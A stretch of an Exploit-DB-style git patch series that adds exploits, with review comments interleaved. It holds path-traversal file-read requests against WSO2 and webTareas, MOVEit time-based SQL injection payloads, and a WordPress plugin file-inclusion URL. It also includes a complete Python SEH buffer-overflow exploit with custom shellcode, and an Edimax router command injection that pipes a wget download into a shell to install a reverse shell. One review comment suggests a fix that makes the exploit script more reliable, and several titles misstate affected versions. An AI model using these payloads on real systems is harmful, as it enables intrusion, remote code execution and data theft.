current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions +Pragma: no-cache +Cache-Control: no-cache + +extensionName=../../../../INSTALL.txt + + ---------------Returned Headers in Response------------------ + +HTTP/1.1 200 
+X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +X-Frame-Options: DENY +Content-Type: text/html;charset=UTF-8 +Content-Length: 10 +Date: Sat, 04 Jan 2020 00:55:38 GMT +Connection: close +Server: WSO2 Carbon Server \ No newline at end of file diff --git a/exploits/php/webapps/48312.txt b/exploits/php/webapps/48312.txt new file mode 100644 index 000000000..c4a02318e --- /dev/null +++ b/exploits/php/webapps/48312.txt @@ -0,0 +1,26 @@ +# Exploit Title: Webtateas 2.0 - Arbitrary File Read +# Date: 2020-04-12 +# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. +# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php +# Software Link: http://webtareas.sourceforge.net/general/home.php +# Version: Webtateas v2.0 +# Tested on: Windows +# CVE : N/A + +Vulnerable Request: +POST /webtareas/includes/general_serv.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 72 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/webtareas/general/home.php? +Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver +DNT: 1 + +action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini \ No newline at end of file diff --git a/exploits/php/webapps/48315.txt b/exploits/php/webapps/48315.txt new file mode 100644 index 000000000..cd87d86a0 --- /dev/null +++ b/exploits/php/webapps/48315.txt 
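Review bot: The title gives the affected product as "WSO2 3.1.0" while the body's "Server version" field says 3.0.0, and the "Security Update" line links to the generic documentation index rather than a fixed release or vendor advisory, so a defender cannot tell from this record which releases are vulnerable and which are patched. Please reconcile the two version numbers and either name the fixed release or say so explicitly (`##Security Update : no fixed version known at time of writing`); the `files_exploits.csv` row added later in this patch repeats the 3.1.0 title. The section "Error displayed in Web browser with body request:" is followed by nothing and should either get its content or be removed, and "Softwrare link", "WOS2" and "broughts my atttention" are typos in the header.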
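Review bot: The product name is spelled "Webtateas" in the Exploit Title and Version lines while every URL and the session cookie in the same file spell it "webtareas"/"webTareas"; in a database that is searched by title this means a query for the real product name will not return the entry. The same misspelling is carried into the `files_exploits.csv` row added later in this patch and into the commit subject. Suggest `# Exploit Title: webTareas 2.0 - Arbitrary File Read`. The header also gives no fix or disclosure status; `# Fixed in: unknown` would make that explicit for readers triaging it.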
@@ -0,0 +1,28 @@ +# Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion +# Google Dork: N/A +# Date: 2020-04-13 +# Exploit Author: Daniel Monzón (stark0de) +# Vendor Homepage: http://davidlingren.com/ +# Software Link: https://wordpress.org/plugins/media-library-assistant/ +# Version: 2.81 +# Tested on: Windows 7 x86 SP1 +# CVE : CVE-2020-11731, CVE-2020-11732 + +----Local File Inclusion---------------------------- + +There is a file inclusion vulnerability in the mla-file-downloader.php file. Example: + +http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php + +Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication. + + +----Multiple Cross-Site-Scripting------------------- + +There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript. + +Note that this vulnerability requires authentication. + + + +Tested on Windows 7 Pro SP1 32-bit and Wordpress 5.3.2 \ No newline at end of file diff --git a/exploits/php/webapps/48316.txt b/exploits/php/webapps/48316.txt new file mode 100644 index 000000000..7d16a13e7 --- /dev/null +++ b/exploits/php/webapps/48316.txt 
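Review bot: Two CVE ids are listed (`CVE-2020-11731, CVE-2020-11732`) for two distinct issues, but the text never says which id belongs to the file inclusion and which to the cross-site scripting, and no fixed plugin version is given, so the record cannot be used to confirm that an installation is patched. Add the mapping on the CVE line, e.g. `# CVE : <LFI id> (LFI), <XSS id> (XSS)` with the ids placed accordingly, and a `# Fixed in:` line once known. The cross-site-scripting section names no parameter or settings tab, so it is not reproducible from this text alone, and "Tested on" is stated twice with slightly different wording (`Windows 7 x86 SP1` vs `Windows 7 Pro SP1 32-bit`). The example URL embeds an absolute install path from the author's test machine and should be marked as such.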
@@ -0,0 +1,34 @@ +# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection +# Google Dork: inurl:human.aspx intext:moveit +# Date: 2020-04-12 +# Exploit Authors: Aviv Beniash, Noam Moshe +# Vendor Homepage: https://www.ipswitch.com/ +# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1 +# CVE : CVE-2019-16383 +# +# Related Resources: +# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability +# https://nvd.nist.gov/vuln/detail/CVE-2019-16383 + +# Description: +# The API call for revoking logon tokens is vulnerable to a +# Time based blind SQL injection via the 'token' parameter + +# MSSQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 32 + +token='; WAITFOR DELAY '0:0:10'-- + + +# MySQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 21 + +token=' OR SLEEP(10); \ No newline at end of file diff --git a/exploits/windows/local/48314.py b/exploits/windows/local/48314.py new file mode 100755 index 000000000..9a6660afb --- /dev/null +++ b/exploits/windows/local/48314.py 
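Review bot: The title names "MOVEit Transfer 11.1.1" as the affected version, but the Version line in the same header lists 11.1.1 (together with 10.2.4 and 11.0.2) as the releases in which the issue is fixed ("before 11.1.1"), so the title points defenders at a patched build; the `files_exploits.csv` row added later in this patch and the commit subject inherit the same title. Suggest `# Exploit Title: MOVEit Transfer < 11.1.1 - 'token' Unauthenticated SQL Injection`, or naming the last vulnerable release instead. A short mitigation line pointing at the vendor article already linked under Related Resources would round off the header for readers who only need the fix.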
@@ -0,0 +1,324 @@ +# Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) +# Exploit Author: Bobby Cooke +# Date: 2020-04-11 +# Vendor: Drive Software Company +# Vendor Site: http://www.drive-software.com +# Software Download: http://www.drive-software.com/download/freeclock.exe +# Tested On: Windows 10 - Pro 1909 (x86) & Home 1909 (x86) +# - Does not work on x64 version +# Version: Free Desktop Clock 3.0 +# Recreate: Install & Open > Time Zones > 'Enter display name' textbox > paste buffer + +############################### CRASH INFO ############################### +# [!] Access violation +# 042D15E7 8908 mov [eax], ecx ; FreeDesk.00440044 +# SEH chain of main thread +# Address SE handler +# 0014EE24 FreeDesk.00410041 <- Structured Exception Handler Overwrite +# 00410041 74737953 +# 69620C00 *** CORRUPT ENTRY *** +############################### CRASH INFO ############################### + +File = 'poc.txt' + +######################### EXPLOIT ENVIRONMENT INFO ######################### +#badChars = '\x00\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e' +#badChars += '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f' +#goodChars = '\x81\x8D\x8F\x90\x9D' (within 0x80-0x9f) + +# Base | Rebase | SafeSEH | ASLR | NXCompat | Modulename +# 0x00400000 | False | False | False | False | [FreeDesktopClock.exe] +# 0x042b0000 | True | False | False | False | [Clock.dll] +######################### EXPLOIT ENVIRONMENT INFO ######################### + +os_nSEH = '\x41'*(457) # Offset to nSEH Overwrite +nSEH = '\xeb\x05' # jmp short +2 +SEH = '\xeb\x43' # 0x004300eb: pop esi# pop ebx# ret [FreeDesktopClock.exe] +# nSEH & SEH translated opcodes after Pop-Pop-Ret +# EB 00 jmp short +2 +# 05 00EB0043 add eax, 4300EB00 + +# GetPC to decode our decoder using Venetian Blinds technique +getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory +getPC += '\x61' # popad # [ESP] = &Payload +getPC += '\x72' # add [edx], dh # 
realigns execution for 1 byte opcodes + +ebx2eax = '\x58' # pop eax # EAX = &Payload +ebx2eax += '\x72' # add [edx], dh + +# Use Venetian Blinds technique to fix our mangled decoder +# + Using the Venetian Blinds Technique costs 14 bytes to fill 1 0x00 with 1 legit shellcode byte. +# +# Ajust EAX to &Decoder +getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x50' # push eax # [ESP] = &Decoder +getDecoder += '\x72' # add [edx], dh + +############################# ZIPPER DECODER ############################### +# Set EAX = First non-null byte of shellcode +# init: +# 1 | 50 | push eax # EAX = &Shellcode +# 2 | 5F | pop edi # EDI = Decoder Destination Base Address +# 3 | 47 | inc edi # First 0x00 byte of shellcode +# 4:5 | 33D2 | xor edx, edx +# 6:7 | 33C9 | xor ecx, ecx +# 8:11 | 66:B9 1004 | mov cx, 410 # ECX = Loop Counter +# decodeLoop: +# 12:13 | 33DB | xor ebx, ebx +# 14 | 42 | inc edx # EDX+EAX = &SourceShellcodeByte +# 15 | 42 | inc edx # increment to next non-null byte +# 16:17 | 32DB | xor bl, bl # clear BL to hold next shellcode byte +# 18:20 | 021C10 | add bl, [eax+edx] # BL = SourceShellcodeByte +# 21:22 | 203F | and [edi], bh # [EDI] = SC-byte, clear with: AND 0x00 +# 23:24 | 301F | xor [edi], bl # Write next byte of shellcode +# 25 | 47 | inc edi +# 26 | 49 | dec ecx +# 27:28 | 74 02 | je short jmp2code +# 29:30 | ^ EB ED | jmp short decodeLoop +# jmp2code: +# 31 | 50 | push eax +# 32 | C3 | ret +################################################3########################### + +#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3' +firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50' +#venBldHalf = '5F 33 33 66 10 33 42 32 02 10 3F 1F 49 02 ED C3' +# 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 + +# Note: These nop unicode 
instructions are actually [reg+0x00] not [reg] +# The [reg] version (0032) is 2 bytes. The [reg+0x00] version (007200) is 3 bytes +# Use the 3 byte version for Venetian Blinds alignment + # Example: + # nasm > add [edx], dh + # 00000000 0032 add [edx],dh + # nasm > add [edx+00], dh + # 00000000 0032 add [edx],dh + # nasm > add [edx+01], dh + # 00000000 007201 add [edx+0x1],dh + # + This happens when typing in ASM commands into msf-nasm_shell and immunity + +## 2nd byte - \x00 => \x5F +venBlinds = '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\xC6\x5F' # mov byte [eax], 0x50 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 4th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 6th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 8th byte - \x00 => \x66 +venBlinds += '\xC6\x66' # mov byte [eax], 0x66 +venBlinds += '\x72' # add [edx], dh // nop to realign 
opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 10th byte - \x00 => \x10 +venBlinds += '\xC6\x10' # mov byte [eax], 0x10 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 12th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 14th byte - \x00 => \x42 +venBlinds += '\xC6\x42' # mov byte [eax], 0x42 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 16th byte - \x00 => \x32 +venBlinds += '\xC6\x32' # mov byte [eax], 0x32 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 
18th byte - \x00 => \x02 +venBlinds += '\xC6\x02' # mov byte [eax], 0x02 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 20th byte - \x00 => \x10 +venBlinds += '\xC6\x10' # mov byte [eax], 0x10 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 22nd byte - \x00 => \x3F +venBlinds += '\xC6\x3F' # mov byte [eax], 0x3F +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 24nd byte - \x00 => \x1F +venBlinds += '\xC6\x1F' # mov byte [eax], 0x1F +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 26th byte - \x00 => \x49 +venBlinds += '\xC6\x49' # mov byte [eax], 0x49 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += 
'\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 28th byte - \x00 => \x02 +venBlinds += '\xC6\x02' # mov byte [eax], 0x02 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 30th byte - \x00 => \xED +venBlinds += '\xC6\xED' # mov byte [eax], 0xED +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 32nd byte - \x00 => \xC3 +venBlinds += '\xC6\xC3' # mov byte [eax], 0xC3 +venBlinds += '\x72' # add [edx], dh +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh +# Jump to the decoded decoder by Returning to the address we saved on the stack +venBlinds += '\xC3' # ret [!] Now we are executing the decoder! 
+ +os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds)) + +#badChars = 00 0d 80 82->8e 91->9f +# Custom PopCalc shellcode that avoids the bad characters +fKernel32 = '\x33\xF6' # xor esi, esi +fKernel32 += '\xF7\xE6' # mul esi +fKernel32 += '\x64\x03\x52\x30' # add edx, fs:[edx+30] # EBX = Address_of_PEB +fKernel32 += '\x03\x42\x0C' # add eax, [edx+C] # EBX = Address_of_LDR +fKernel32 += '\x03\x70\x1C' # add esi, [eax+1C] # ESI = 1st entry in InitOrderModuleList / ntdll.dll +fKernel32 += '\xAD' # lodsd # EAX = 2nd entry in InitOrderModuleList / kernelbase.dll +fKernel32 += '\x50' # push eax +fKernel32 += '\x5E' # pop esi +fKernel32 += '\xAD' # lodsd # EAX = 3rd entry in InitOrderModuleList / kernel32.dll +fKernel32 += '\xFF\x70\x08' # push dword ptr [eax+8] # [ESP] = &kernel32 + +gExpotTbl = '\x33\xC9' # xor ecx, ecx +gExpotTbl += '\x33\xF6' # xor esi, esi +gExpotTbl += '\x33\xDB' # xor ebx, ebx +gExpotTbl += '\xF7\xE3' # mul ebx +gExpotTbl += '\x58' # pop eax # EAX = &kernel32 +gExpotTbl += '\x50' # push eax # [ESP] = &kernel32 +gExpotTbl += '\x03\x70\x3C' # add esi, [eax+0x3C] ; ESI = RVA NewEXEHeader +gExpotTbl += '\x03\xF0' # add esi, eax ; ESI = &NewEXEHeader +gExpotTbl += '\x03\x56\x78' # add edx, [esi+0x78] ; EDX = RVA ExportTable +gExpotTbl += '\x03\xD0' # add edx, eax ; EDX = &ExportTable = 763477B0 + +gExpotTbl += '\x03\x5A\x20' # add ebx, [edx+0x20] ; EBX = RVA ExportNameTable +gExpotTbl += '\x03\xD8' # add ebx, eax ; EBX = &ExportNameTable + +gExpotTbl += '\x03\x4A\x24' # add ecx, [edx+0x24] ; ECX = RVA ExportOrdinalTable +gExpotTbl += '\x03\xC8' # add ecx, eax ; ECX = &ExportOrdinalTable +gExpotTbl += '\x51' # push ecx + +gExpotTbl += '\x33\xFF' # xor edi, edi +gExpotTbl += '\x03\x7A\x1C' # add edi, [edx+0x1C] ; EDI = RVA ExportAddrTable +gExpotTbl += '\x03\xF8' # add edi, eax ; EDI = &ExportAddrTable +gExpotTbl += '\x57' # push edi + +fWinExec = '\x68\x57\x69\x6E\x45' # push 0x456E6957 ; EniW +fWinExec += '\x33\xC0' # xor 
eax, eax ; EAX = Counter + +fWinExec += '\x33\xF6' # xor esi, esi +fWinExec += '\x03\xF4' # add esi, esp ; ESI = "WinE" +fWinExec += '\xFC' # cld ; Process strings left to right +fWinExec += '\x50' # push eax +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\x33\xFF' # xor edi, edi +fWinExec += '\x03\x3C\x18' # add edi, [eax+ebx] +fWinExec += '\x58' # pop eax +fWinExec += '\x03\x7C\x24\x0C' # add edi, [esp+0xC] ; EDI = &NthNameString +fWinExec += '\xF3\xA6' # repe cmpsb ; compare [&NthNameString] to "WinExec" +fWinExec += '\x74\x03' # jz found ; If [&NthNameString] == "WinExec" end loop +fWinExec += '\x40' # inc eax ; Counter ++ +fWinExec += '\xEB\xE1' # jmp short searchLoop ; restart loop + +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x03\x4C\x24\x08' # add ecx, [esp+0x8] ; ECX = &ExportOrdinalTable +fWinExec += '\x03\xC8' # add ecx, eax +fWinExec += '\x33\xC0' # xor eax, eax +fWinExec += '\x66\x03\x01' # add ax, [ecx] ; AX = ordinalNumber + +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41\x41\x41\x41' # inc ecx X 4 +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\xFF\x74\x24\x04' # push dword [esp+0x4] +fWinExec += '\x01\x04\x24' # add [esp], eax +fWinExec += '\x5A' # pop edx +fWinExec += '\x33\xDB' # xor ebx, ebx +fWinExec += '\x03\x1A' # add ebx, [edx] ; EBX = RVA WinExec +fWinExec += '\x03\x5C\x24\x0C' # add ebx, [esp+0xC] ; EBX = &WinExec +# Call WinExec( CmdLine, ShowState ); +# CmdLine = "calc.exe" +# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window +callWinExec = '\x33\xC9' # xor ecx, ecx ; clear eax register +callWinExec += '\x51' # push ecx ; string terminator 0x00 for "calc.exe" string +callWinExec += '\x68\x2E\x65\x78\x65' # push 
0x6578652e ; exe. : 6578652e +callWinExec += '\x68\x63\x61\x6C\x63' # push 0x636c6163 ; clac : 636c6163 +callWinExec += '\x33\xC0' # xor eax, eax +callWinExec += '\x03\xC4' # add eax, esp ; save pointer to "calc.exe" string in eax +callWinExec += '\x41' # inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001 +callWinExec += '\x51' # push ecx ; uCmdShow - push 0x1 to stack # 2nd argument +callWinExec += '\x50' # push eax ; lpcmdLine - push string address stack # 1st argument +callWinExec += '\xFF\xD3' # call ebx ; Call the WinExec Function + +shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec + +buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode +filler = '\x77'*(9000-len(buffer)) +buffer = buffer+filler + +try: + payload = buffer + f = open(File, 'w') + f.write(payload) + f.close() + print File + " created successfully" +except: + print File + ' failed to create' \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 558ffa2fb..5c32f12c6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
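Review bot: The payload is written through `open(File, 'w')`, a text-mode handle; on Windows, the stated test platform, text mode rewrites any `\x0a` in the buffer as `\x0d\x0a`, and `\x0d` is in the file's own bad-character list, so the file should be opened with `'wb'`. The bare `except:` around the write discards the real error, which makes a failed run indistinguishable from a permission problem or a bad path; catch `IOError as e` and print it alongside the existing message. The script is Python 2 only (`print` statements, and `512/2` used as a repeat count would raise under Python 3), which the header should state, e.g. `# Tested with: Python 2.7`.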
@@ -11026,6 +11026,7 @@ id,file,description,date,author,type,platform,port
 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
+48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42550,3 +42551,9 @@ id,file,description,date,author,type,platform,port
 48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
 48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware,
 48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,
+48310,exploits/hardware/webapps/48310.txt,"Huawei HG630 2 Router - Authentication Bypass",2020-04-13,"Eslam Medhat",webapps,hardware,
+48311,exploits/hardware/webapps/48311.py,"TVT NVMS 1000 - Directory Traversal",2020-04-13,"Mohin Paramasivam",webapps,hardware,
+48312,exploits/php/webapps/48312.txt,"Webtateas 2.0 - Arbitrary File Read",2020-04-13,"China Banking and Insurance Information Technology Management Co.",webapps,php,
+48313,exploits/java/webapps/48313.txt,"WSO2 3.1.0 - Arbitrary File Delete",2020-04-13,"Raki Ben Hamouda",webapps,java,
+48315,exploits/php/webapps/48315.txt,"Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion",2020-04-13,"Daniel Monzón",webapps,php,
+48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Noam Moshe",webapps,php,
From 0137126a8e039b1ef7ba0e343722a7e7d3ae2b90 Mon Sep 17 00:00:00 2001
From: Offensive Security Date: Wed, 15 Apr 2020 05:01:49 +0000 Subject: [PATCH 10/18] DB: 2020-04-15 4 changes to exploits/shellcodes B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter) Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution WSO2 3.1.0 - Persistent Cross-Site Scripting Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution --- exploits/hardware/webapps/48318.txt | 42 ++++++++ exploits/java/webapps/48319.txt | 142 ++++++++++++++++++++++++++++ exploits/java/webapps/48320.py | 90 ++++++++++++++++++ exploits/windows/local/48317.py | 55 +++++++++++ files_exploits.csv | 4 + 5 files changed, 333 insertions(+) create mode 100644 exploits/hardware/webapps/48318.txt create mode 100644 exploits/java/webapps/48319.txt create mode 100755 exploits/java/webapps/48320.py create mode 100755 exploits/windows/local/48317.py diff --git a/exploits/hardware/webapps/48318.txt b/exploits/hardware/webapps/48318.txt new file mode 100644 index 000000000..c9731d595 --- /dev/null +++ b/exploits/hardware/webapps/48318.txt 
@@ -0,0 +1,42 @@ +# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution +# Date: 2020-04-13 +# Exploit Author: Wadeek +# Hardware Version: EW-7438RPn-v3 Mini +# Firmware Version: 1.23 / 1.27 +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip + +== Shodan Dorks == + +(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp" +(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234" + +== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) == + +GET /wizard_reboot.asp +showSSID = ""; +document.write(''+""+''); + +== Command Execution * == + +(Setup Mode) +curl 'http:///goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +(Unsetup Mode with default password) +curl 'http:///goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +== Cross-Site Request Forgery -> Command Execution * == + +
+ + +
+ +* [ delivery.sh ] +-------------------------------------------------------------------------------------- +# (msfvenom) linux/mipsbe/shell/reverse_tcp +cd /tmp/ +busybox wget -O reverse http:///reverse +busybox chmod +x reverse +./reverse & +-------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/java/webapps/48319.txt b/exploits/java/webapps/48319.txt new file mode 100644 index 000000000..8aa2b6577 --- /dev/null +++ b/exploits/java/webapps/48319.txt 
